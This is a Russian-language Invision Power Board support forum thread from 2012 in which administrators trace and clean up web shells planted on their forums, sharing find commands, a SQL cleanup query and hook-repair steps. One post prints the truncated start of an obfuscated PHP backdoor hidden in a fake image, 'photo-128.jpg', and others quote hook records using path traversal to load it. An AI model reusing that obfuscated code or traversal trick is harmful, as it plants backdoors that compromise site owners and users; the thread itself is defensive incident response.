mizer сказал(а):
Как вариант - поиск через ssh, например так:
find www/site_dir -mtime -10d -name "*.php"
find www/site_dir -mtime -10d -name "*.php"
На modify time не стоит сильно надеется.
Security update
#47
chuma64rus ответил: 
- Member
-
- Группа: Пользователи
- Сообщений: 14
- Регистрация: 25-Апрель 09
- Репутация: 1
- IPB version:3.3.x
Отправлено 11 Ноябрь 2012 - 02:50
Кстати заметил, у меня стоят тестовые форумы от IPS и IBR самое интересное, то что от IPS я шеллов не нашел, все они в IBR. Почему затронуло мою лицензию, ответ прост, я заливал core.php от IBR и часть локализированных версий.
#48
GeoLik ответил:
- Advanced
-
- Группа: IPB Specialist
- Сообщений: 785
- Регистрация: 10-Март 07
- Репутация: 42
- IPB version:3.3.x
Отправлено 11 Ноябрь 2012 - 03:19
chuma64rus сказал(а):
Почему затронуло мою лицензию, ответ прост, я заливал core.php от IBR
Если имеет ввиду последний патч, то на IBR стоит ссылка для скачивания на IPS, это уже выяснили вот тут.
Ищите лучше. Мне залили не зависимо от источника дистра, хоть от IBR, хоть от IPS
Дописываю.
Хотя стоп! На данный момент там (на IBR) уже типа русифицированные.
В день, когда я скачивал, файлы скачанные с ИБР пришлось переименовывать, с сейчас там названия архивов с приставкой "rus".
но если кто-то не успел пропатчить, не рекомундую раслабляться.
#49
chuma64rus ответил:
- Member
-
- Группа: Пользователи
- Сообщений: 14
- Регистрация: 25-Апрель 09
- Репутация: 1
- IPB version:3.3.x
Отправлено 11 Ноябрь 2012 - 03:36
Патчи от IPS я уже установил. Мда.. Что нам дальше стоит ожидать? Что школота будет заходит спокойно под администратором ))
P.S. Все нахожу и нахожу новые и новые файлики )) Была создана аж целая директория..
P.S. Все нахожу и нахожу новые и новые файлики )) Была создана аж целая директория..
#50
GeoLik ответил:
- Advanced
-
- Группа: IPB Specialist
- Сообщений: 785
- Регистрация: 10-Март 07
- Репутация: 42
- IPB version:3.3.x
Отправлено 11 Ноябрь 2012 - 03:39
chuma64rus сказал(а):
Была создана аж целая директория..
Посмотрите на скринах сколько директорий было создано на одном из акков на моем севере.
#51
chuma64rus ответил:
- Member
-
- Группа: Пользователи
- Сообщений: 14
- Регистрация: 25-Апрель 09
- Репутация: 1
- IPB version:3.3.x
Отправлено 11 Ноябрь 2012 - 03:42
А я все думал почему я не могу войти на свой сервер, ко всем ресурсам инета есть доступ, а к своему не могу пробиться.. Возможно ли из за этого?
#53
siv1987 ответил:
- Advanced
-
- Группа: IPB Skins Team
- Сообщений: 9 065
- Регистрация: 20-Март 09
- Репутация: 2 430
- IPB version:3.1.x
Отправлено 11 Ноябрь 2012 - 04:35
chuma64rus сказал(а):
P.S. Все нахожу и нахожу новые и новые файлики
Шеллы все удалили? А то им ваши запладки до одного место.
voron333 сказал(а):
в таблице `core_hooks_files` подменили путь к хукам
в boardIndexRecentTopics вел к тому самому файлу /uploads/profile/photo-128.jpg
в boardIndexRecentTopics вел к тому самому файлу /uploads/profile/photo-128.jpg
56 15 ../uploads/profile/photo-128.jpg boardIndexRecentTopics.php commandHooks 57 15 ../../../../../../../tmp/tmpgw4ia4 boardIndexRecentTopics.php commandHooks
Теперь понятно откуда ноги растут. Тем кто нашел у себя "photo-128.jpg", обязательно проверьте таблицу ibf_core_hooks_file, и файлы на которые они указывают если есть что-то подобное.
Удалить можно смело выполнив такой запрос
DELETE chf.*, ch.* FROM ibf_core_hooks_files chf LEFT JOIN ibf_core_hooks ch ON (chf.hook_hook_id = ch.hook_id) WHERE chf.hook_file_stored LIKE '%../%'
А после обязательно перестроить кеш: Система -> Управление кешем -> Перестроить весь кеш
#55
voron333 ответил:
- Newbie
-
- Группа: Пользователи
- Сообщений: 7
- Регистрация: 21-Август 10
- Репутация: 1
- IPB version:3.3.x
Отправлено 11 Ноябрь 2012 - 11:30
Кстати, немного разбирался в действиях шалунишек... Фактически меня ломанули 4 числа, но в хуках подмена появилась аж 9! До этого была только папка cache... И по логам - она посещелась и шеллом пользовались.
На всякий случай рекомендую сменить пароли на фтп, пароли к базе, пароли к админским аккам и проверить крон.
На всякий случай рекомендую сменить пароли на фтп, пароли к базе, пароли к админским аккам и проверить крон.
#56
Семёныч ответил:
- Advanced
-
- Группа: Пользователи
- Сообщений: 183
- Регистрация: 21-Июль 10
- Репутация: 3
- IPB version:3.3.x
Отправлено 11 Ноябрь 2012 - 12:15
siv1987 сказал(а):
Теперь понятно откуда ноги растут. Тем кто нашел у себя "photo-128.jpg", обязательно проверьте таблицу ibf_core_hooks_file, и файлы на которые они указывают если есть что-то подобное.
как это поправить в базе????
нужен совет..)))
#57
voron333 ответил:
- Newbie
-
- Группа: Пользователи
- Сообщений: 7
- Регистрация: 21-Август 10
- Репутация: 1
- IPB version:3.3.x
Отправлено 11 Ноябрь 2012 - 12:23
Для начала попробуйте сделать переимпортирование всех хуков из админки. Если само не восстановится, то:
В папке hooks ищете название файла boardIndexRecentTopicsXXXXXXXXXXXXXXXXX.php. И в ячейке 'hook_file_stored' вместо "../uploads/profile/photo-128.jpg" прописываете его.
Потом в бекапах открываете этот файл, копируете содержимое и в ячейку 'hooks_source' вставляете.
В папке hooks ищете название файла boardIndexRecentTopicsXXXXXXXXXXXXXXXXX.php. И в ячейке 'hook_file_stored' вместо "../uploads/profile/photo-128.jpg" прописываете его.
Потом в бекапах открываете этот файл, копируете содержимое и в ячейку 'hooks_source' вставляете.
Сообщение изменено: voron333 (11 Ноябрь 2012 - 12:28)
#58
GeoLik ответил:
- Advanced
-
- Группа: IPB Specialist
- Сообщений: 785
- Регистрация: 10-Март 07
- Репутация: 42
- IPB version:3.3.x
Отправлено 11 Ноябрь 2012 - 12:55
Нашел на одном из форумов:
zaraza-04.png (22,41К)
Количество загрузок: 81
Файл photo-128.jpg был, размером 68996 байт, но датирован 2012-10-12, и не открыватеся в граф. программах.
НО, открывается тупо в текстовых редакторах и код у него внутри начинается на:
Файл удалил еще в первый день, как только обнаружил, но открыть в текстовом редакторе догадался только сегодня. копия есть, если кому поможет.
Файла av-128.jpg не было. Директорию tmp чистил в самом начале, было там что-то или нет, не видел. Сейчас нет.
В общем, часть заразы может быть датирована любой датой!!!!!! Если закачан в архиве и распакован с архива, то дата и не будет меняться.
zaraza-04.png (22,41К)
Количество загрузок: 81
Файл photo-128.jpg был, размером 68996 байт, но датирован 2012-10-12, и не открыватеся в граф. программах.
НО, открывается тупо в текстовых редакторах и код у него внутри начинается на:
<?php $jr4R="";/*'_S*/$iNTPs=/*sv*/$jr4R;/*)J*/$NjKTIGz="\57\56\52";$hIvw="\57\145";$PjSITU=$NjKTIGz./*XRb*/$hIvw;$irMV10S="\160\162\145";$VS7QyJz="\147\137\162";/*WiD*//*J%*/$KbMfs5P="\145\160\154";$ijt2="\141\143\145";/*7**/$dVRof=$irMV10S/*oK*/.$VS7QyJz/*S~*/./*=0y*/$KbMfs5P./*S-*/$ijt2/*A N*/;/*+Kx*/$rh7y='ZerGO4dAg251xkIDzbahXonQ8U96SCsYVp7TjuWtJKfyN3BFql';/*,A*/$AZ7Q3bE='PRwmiEv0MHLc';/*IY*/$lvXzR4U=/*p%N*/$rh7y/*,:*/.$AZ7Q3bE;/*";d*/$AuGal=';\'2M4"hFu1`,Kl3~8./5:Nt]j#yVxW6LX!B_&CnAS}J7=%k*oc-^ +0Ozi9qQg';/*;-*/$Jfnw=/*dC*/$AuGal/*
Файл удалил еще в первый день, как только обнаружил, но открыть в текстовом редакторе догадался только сегодня. копия есть, если кому поможет.
Файла av-128.jpg не было. Директорию tmp чистил в самом начале, было там что-то или нет, не видел. Сейчас нет.
В общем, часть заразы может быть датирована любой датой!!!!!! Если закачан в архиве и распакован с архива, то дата и не будет меняться.
#59
Семёныч ответил:
- Advanced
-
- Группа: Пользователи
- Сообщений: 183
- Регистрация: 21-Июль 10
- Репутация: 3
- IPB version:3.3.x
Отправлено 11 Ноябрь 2012 - 12:56
voron333, Я что то не могу найти в таблице core_hooks_files строки ведущей к "../uploads/profile/photo-128.jpg"
может быть у меня не произошли изменения из за префикса таблицы???
может быть у меня не произошли изменения из за префикса таблицы???
#60
voron333 ответил:
- Newbie
-
- Группа: Пользователи
- Сообщений: 7
- Регистрация: 21-Август 10
- Репутация: 1
- IPB version:3.3.x
Отправлено 11 Ноябрь 2012 - 13:01
Семёныч 11 Ноябрь 2012 - 12:56 сказал(а):
voron333, Я что то не могу найти в таблице core_hooks_files строки ведущей к "../uploads/profile/photo-128.jpg"
может быть у меня не произошли изменения из за префикса таблицы???
может быть у меня не произошли изменения из за префикса таблицы???
Нет, может еще не дошли просто )))
Смотрите выше я писал
voron333 11 Ноябрь 2012 - 11:30 сказал(а):
Фактически меня ломанули 4 числа, но в хуках подмена появилась аж 9!
- ← Покупка лицензии IPB 3.4
- Дискуссионный клуб. Споры на тему IPB
- Апгрейд лицензии и смена домена (IPB 3.4.6) →